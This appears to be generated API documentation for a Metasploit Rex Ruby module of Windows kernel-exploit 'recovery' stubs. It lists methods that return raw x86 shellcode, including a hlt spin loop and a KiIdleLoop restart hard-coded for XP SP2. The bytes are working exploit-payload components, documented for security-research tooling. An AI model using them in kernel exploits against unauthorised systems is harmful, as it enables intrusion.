module Rex::Payloads::Win32::Kernel::Recovery
Recovery
stubs are responsible for ensuring that the kernel does not crash. They must 'recover' after the exploit has succeeded, either by consuming the thread or continuing it on with its normal execution. Recovery
stubs will often be exploit dependent.
Public Class Methods
default(opts = {})
click to toggle source
The default recovery method is to spin the thread
# File lib/rex/payloads/win32/kernel/recovery.rb, line 17 def self.default(opts = {}) spin(opts) end
idlethread_restart(opts = {})
click to toggle source
Restarts the idle thread by jumping back to the entry point of KiIdleLoop. This requires a hard-coded address of KiIdleLoop. You can pass the 'KiIdleLoopAddress' in the options hash.
# File lib/rex/payloads/win32/kernel/recovery.rb, line 33 def self.idlethread_restart(opts = {}) # Default to fully patched XPSP2 opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil? "\x31\xC0" + # xor eax,eax "\x64\xC6\x40\x24\x02" + # mov byte [fs:eax+0x24],0x2 "\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c] "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27 "\x6A\x00" + # push byte +0x0 "\xFF\xE0" # jmp eax end
spin(opts = {})
click to toggle source
Infinite 'hlt' loop.
# File lib/rex/payloads/win32/kernel/recovery.rb, line 24 def self.spin(opts = {}) "\xf4\xeb\xfd" end